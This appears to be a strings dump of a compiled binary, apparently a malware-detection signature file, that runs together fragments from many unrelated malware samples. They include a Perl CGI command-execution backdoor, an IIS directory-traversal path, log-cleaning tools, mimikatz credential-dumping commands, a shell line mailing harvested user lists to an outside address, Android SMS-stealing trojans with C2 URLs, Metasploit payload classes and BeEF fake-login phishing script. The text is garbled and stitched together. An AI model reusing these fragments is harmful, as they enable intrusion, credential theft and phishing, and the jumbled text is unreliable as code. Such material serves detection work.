 @Stego:syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";$_ = $ENV{QUERY_STRING};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\">   Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName)     value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\">  WIndows 2000 OldPwd = Request.Form(\"OldPwd\") NewPwd2 = Request.Form(\"NewPwd2\") NewPwd1 = Request.Form(\"NewPwd1\") made to port 80 of the remote machine at 192.168.1.101 with theUnable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s    - outbound source port numberAttempting to connect to %s port %dUsage: concon \\\\ip\\sharename\\con\\conexitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, FalseEchoB(\"regsvr32.exe exitcode = \" & exitcode)Public Property Get oFS()CleanIP - Specify IP Address Which You Want Clear.LogFile - Specify Log File Which You Want Process.CleanIISLog VermsftpsvcFatal Error: MFC initialization failedSpecified \"ALL\" Will Process All Log Files.Specified \".\" Will Clean All IP Record.Service %s Stopped.Process Log File %s...Power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"SQLCheck can only scan a class B network. Try again.Example: SQLCheck 192.168.0.1 192.168.0.254Usage: SQLCheck <StartIP> <EndIP>RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.comNote: This Program Can'nt Run With Local Machine.%s Execute Succussifully.Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]Creation of results file - \"%s\" failed.c:\\>nbtdump remote-machineCerberus NBTDUMP<CENTER><H1>Cerberus Internet Scanner</H1><
Portions Copyright (c) 1997-1999 Lee HasiukWINNT\\System32\\stdole2.tlbG
NeoLite Executable File Compressorie686@sohu.comsplitjoin.exeSplitJoin<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">Set thisfile = fs.GetFile(whichfile)if Request.Cookies(\"password\")=\"juchen\" then Set thisfile = fs.OpenTextFile(whichfile, 1, False)color: rgb(255,0,0); text-decoration: underline }if Request(\"creat\")<>\"yes\" then<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.Execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s    - outbound connection source port numberFPipeTo Open RegistryI love Candy very much!!GinaDLLh
TRM_HOOKCALLBACK(non-Win32 .EXE or error in .EXE image).PASS hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exeMAIL FROM:hacker@hacker.comhttp://isno.yeah.netSet ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)Set objNet = WScript.CreateObject( \"WScript.Network\" )Set fso = CreateObject(\"Scripting.FileSystemObject\")2TInject.DllWindows ServicesFindrst6Press Any Key To Continue......if not exist %1\\rshsetup.exe goto ERROR2ECHO rshsetup.exe is not found in the %1 directoryREM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeECHO Use \"net start rshsvc\" to start the service.rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dllpushd %SystemRoot%\\system32NEWGINA.dllWlxActivateUserShellWlxWkstaLockedSASWlxIsLockOkWlxShutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lstS
\\ws2check.exe\\trojans.lst1
%s - simple sniffer for win2000  -pass        : Filter username/password  -udp         : Output udp packets  -tcp         : Output tcp packetsFScan v1.12 - Command line port scanner. -n    - no port scanning - only pinging (unless you use -q)Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200 -z    - maximum simultaneous threads to use for scanningFailed to open the IP list file \"%s\" -p    - TCP port(s) to scan (a comma separated list of ports/ranges) Bind port number out of range. Using system default.f
Connecting HTTP Port - Result: No space for command line argument vectorMicrosoft(July/1999~) http://www.microsoft.com/technet/security/current.aspNo space for copy of command line-  Windows NT,2000 Patch Method  - scanf : floating point formats not linkedhrdir_b.c: LoadLibrary != mmdll borlndmm failed!\"what?\"%s Port %d Closedprintf : floating point formats not linkedxxtype.cpp-ERR Invalid Command, Type [Help] For Command List-ERR Get SMS Users ID FailedControl Time Out 90 Secs, Connection Closed-ERR Post SMS FailedCurrent.hltHistroy.hlt-ERR Send SMS Failed-ERR Change Password <New Password>+OK Send SMS Succussifully+OK Set New Password: [%s]CHANGE PASSWORDS:\\Ammyy\\sources\\target\\TrService.cppS:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cppGlobal\\Ammyy.Target.IncomePortS:\\Ammyy\\sources\\target\\TrFmFileSys.cppPlease enter password for accessing remote computerCreateProcess1()#3 %d error=%dCHttpClient::SendRequest2(%s, %s, %d) error: invalid host name.ERROR: CreateProcessAsUser() error=%d, session=%dERROR: FindProcessByName('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.Type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]Slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ Passwords don't match - your armor crumbles away ][ Passwords don't match - checking turned off ]Writing packet : error on socket (or connection closed): %sRemote connection closed by signal SIG%s %sReading private key %s failed (bad passphrase ?)Server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sRemote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainPublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u 
seconds. (found %d ips)Usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)Invalid IP.# scanning: Unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by Eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${BLU}Private Scanner By Raphaello , DeMMoNN , tzepelush & DraC\\n\\rkillall -9 pscan2echo \"[*] ${DCYN}Gata esti h4x0r ;-)${RES}  [*]\"echo -e \"${DCYN}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${RES}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"Usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = AF_INET;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$Plug-in thread causes an exception, failed to alert user.PlugGetUdpPortPlugGetTcpPortPlugGetVulnNum\\\\.\\pipe\\PipeCmd_communicatonPipeCmd ServiceL
DefaultPort.lstScan over.Used %dms!w
Connect to %s MSSQL server success. Type Command at Prompt.;DATABASE=masterSELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserversekurlsa::msvsekurlsa::wdigestsekurlsa::kerberossekurlsa::tspkgsekurlsa::livesspsekurlsa::sspsekurlsa::processekurlsa::minidumpsekurlsa::pthsekurlsa::ticketssekurlsa::ekeyssekurlsa::dpapisekurlsa::credmancryptprimitives.pdbNow is t1OALICE123BOBBY456
\\Domains\\Account\\Domains\\Account\\Users\\Names\\SID               :* NTLM     :Authentication Id :wdigest :\\Release\\AppInitHook.pdbAppInitHook.dllm
VoidFuncSelect * from Win32_Service Where Name ='VSS'Select * From Win32_ShadowCopycmd /C mklink /D ClientAccessibleTCP Port ScannepUsage:   %s TCP/SYN StartIP [EndIP] Ports [Threads] [/T(N)] [/(H)Banner] [/Save]\nGlobal\\FwtSqmSession106829323_S-1-5-19EVERYONEy0uar3@s!llyid!07,ou74n60u7f001\\KB25468.datNetMgStartNetmgmt.srgprxTroy
\"%s\"  /install \"%s\"\"%s\"  \"%s\" \"%s\" %sgoto xzz%d.bat\
EVverclvid.exel2r8iX
^G1'91
ca[=Yhg!
ECTLUSetEndOfFileu
t_quit_got_dir
C!@I#%VJSIEOTQWPVz034vuABAISEO%$2fas9vQsfvx%$1.2.7.f-hanba-win64-v1md %s&copy %s\\*.* %s%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\"Ge.tVol. .umeIn..for  mati.onW
RSRC_HTMLHwpFilePathCheck.dllAdobeArm.exeOpenDocumentExePath: %s\nXlsPath: %s\nTmpPath: %s\nscvrit001.batxc123465-efff-87cc-37abcdef9[
cvrit000.bat[
WMPNetworkSvcUpdatebackSched.dll\\mspaint.exeX,LLIe{))%%l2i<[AM|aq!Ql/lPlw]d7@C-#j.<c|#*}Kx4_H(q^F-F^p/[t#%HT%s is an essential element in Windows System configuration and management. %s%SYSTEMROOT%\\system32\\svchost.exe -k %s\\system32\\%s:R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat}[eLkQAeEae0t@h18g!)3x-RvE%+^`n.6^()?+00ME6a&F7vcV}`@.dj]&u$o*vX
scardprv.dll
 0@P`p
xercescSuccess - Accept AuthFail - Accept Auth%s %-20s %10lu %sRESPONSE 200 OK!!!
@recdiscm32.exe\\\\%s\\shared$\\syswow64\\\\%s\\shared$\\system32!emCFgv7Xc8ItaVGN0bMf!ctRHFEX5m9JnZdDfpK!VWBeBxYx1nzrCkBLGQOiamsorry!@1234567cmd.exe /c \"net share admin$ /d\"MAIL FROM:<Subject: %s|%s|%s
wmplog21t.sqmwmplog15r.sqmwmplog09c.sqmKBD_%%s_%%02d%%02d%%02d%%02d%%02d.CAT:L1\ndel \"%s\"\nif exist \"%s\" goto L1\ndel \"%s\"\n\" goto R1\ndel /a \"@echo off\n:R1\ndel /a \"*
uwauserv.dll
banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdSTART_SERVICEextra_key_smsandroid.provider.Telephony.SMS_RECEIVEDmPhoneNumbercnlybnq.qrk" // encrypted string "payload.dexCardholder nameinstagram.phpupd.php?text=android.app.action.ADD_DEVICE_ADMINTap ACTIVATE to continue with software update/upload-pictures.php?Opened Dialog:com/connect/MyServiceandroid/os/Binderandroid/app/ServiceDroidianDroidianServiceServiceReceiverDendroidlastGamefile:///android_asset/enableCheatshttp://112.74.111.42:8000SHA1-Digest: oIx4iYWeTtKib4fBH7hcONeHuaE=ONLINEGAMEPROCEDURE_WHICH_WAP_IDhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogSHA1-Digest: +RsrTx5SNjstrnt7pNaeQAzY4kc=SHA1-Digest: Rt2oRts0wWTjffGlETGfFix1dfE=http://image.baidu.com/wisebrowse/index?tag1=%E6%98%8E%E6%98%9F&tag2=%E5%A5%B3%E6%98%8E%E6%98%9F&tag3=%E5%85%A8%E9%83%A8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022D4NotLeftTriangleEqual=022ECSHA1-Digest: X27Zpw9c6eyXvEFuZfCL2LmumtI=_ZNSt12_Vector_baseISsSaISsEE13_M_deallocateEPSsjFBTP2AHR3WKC6LEYON7D5GZXVISMJ4QUlibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizAndroidManifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2Decrypt.malloc.memset.free.pluginSMS_encrypt.Java_com_skymobi_pay_common_util_LocalDataDecrpty_Encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%VILLLLLL280128120000Z0W1E6FFF4C5062FBDC9886FEC93A75D2AC1121120104150Z&inbox_timestamp > 0 and is_permanent=1contact_id = ? 
AND mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.B99^GGD&R-22922222222222222222Q^SAAWAt2222222222229222Q^SAAWAbuildidDCEF055EEE3F76CABB27B3BD7233F6E3C143D55D996634D1B761709372042474FIND_VALID_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??????;;;;;;888888444444000000,,,,,,''''''''''''######OOO###2e6081a2-a063-45c7-ab90-5db596e42c7cMSACM32.dllMAIN_TEXT_TAG080229013346Z350717013346Z0NUMBER_CHAR_EXP_SIGNLoganberryApplicationattachBaseContextObstetricres/xml/device_admin_data.xml]data:image/png;base64,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device_admin_descPillagedActivityEpigraphyServicexbot007:Write APK file (from txt in assets) to SDCard sucessfully!4Write APK (from Txt in assets) file to SDCard  Fail!138675150963res/xml/device_admin.xmlDevice registered: regId =cmVudCYmJg==dXNzZCYmJg==HDNRQ2gOlmlElvyohc9Y1X+nzVUEjW8W3SbUAcertificado # 73828394A compania TMN informa que o vosso sistema Android tem vulnerabilidadeandroid.app.extra.ADD_EXPLANATIONdevice_policycontent://sms/#admin_startkill callunstop all numbers*Lcom/metasploit/stage/PayloadTrustManager;(com.metasploit.stage.PayloadTrustManagerLcom/metasploit/stage/Payload$1;Lcom/metasploit/stage/Payload;-com.metasploit.meterpreter.AndroidMeterpreter,Lcom/metasploit/stage/MainBroadcastReceiver;#Lcom/metasploit/stage/MainActivity;Lcom/metasploit/stage/a;Lcom/metasploit/stage/c;Lcom/metasploit/stage/b;android.engine.apktel:lockNowCmd_confSms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlPKSELEN3333http://mayis24.4tubetv.xyz/dmr/yaNPKIportraitCallBack(android.app.extra.DEVICE_ADMINSMSReceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_dataVisa ElectronE!QQAZXS__exidx_endres/layout/notify_apkinstall.xmlPKpluginSMS_decrypt__dso_handlelib/armeabi/libmylib.soUT]Diok\"3|0597794205New victim 
arrivedhttp://ksa-sef.com/Hack%20Mobaile/ADDNewSMS.phphttp://ksa-sef.com/Hack%20Mobaile/AddAllLogCall.phphttp://ksa-sef.com/Hack%20Mobaile/addScreenShot.phphttp://ksa-sef.com/Hack%20Mobaile/ADDSMS.phphttp://ksa-sef.com/Hack%20Mobaile/ADDVCF.phphttp://ksa-sef.com/Hack%20Mobaile/ADDIMSI.phphttp://ksa-sef.com/Hack%20Mobaile/ADDHISTORYINTERNET.phphttp://ksa-sef.com/Hack%20Mobaile/addInconingLogs.phpodNotice.txtcamera This device has camera!camera This device has Nooo camera!send|1sBdBBbbBBF|K|send|372|ScreamSMS|senssdsend|5ms5gs5anncsend|45CLCLCa01send|999SAnd|TimeStart!s!c!r!e!a!m!SERVER_IPSERVER_NAMEcontent://sms/inboxscreamHackerscreamondroid.pnggetSrvAddrgetSrvPortandroid.intent.action.START_GOOGLE_SERVICEjavascript:scrollTojavascript:document.getElementById('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/PopReceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obBkPVC2pvJmWSfHzXhhttp://joyappstech.biz:11111/knock/I HATE TESTERS onGlobalLayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtQ,hu4P#hT;U!XO7T,uD+Gkwg#M!lf>Laq&+J{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getElementById('darkenScreenObject'); beef.execute(function() {var logo  = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('Enter your Apple ID e-mail address and password');sneakydiv.innerHTML= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo  = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'Session Timed Out <img src=\"' + lilogo + '\" align=right height=20 width=70 
alt=\"LinkedIn\">';var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"YouTube\">';var title = 'Session Timed Out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"Yammer\">';var logobox = 'style=\"border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerHTML= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>Your session has timed out!</h2><p>Forinner.append(title, description, user,password);sneakydiv.innerHTML= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getElementById('uname').value+':'+document.getElementById('pass').value;password.keydown(function(event) {j@h
UVODFRYSIHLNWPEJXQZAKCBGMT_
*tanentry**<option*<select*<inputsenhacartaocaix
[]A\A]A^A_
GCC: (GNU) 7.2.0
init.c
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.6973
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
/tmp/ccnAy7Ww.o
Lsignature
Lsignature_end
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.comment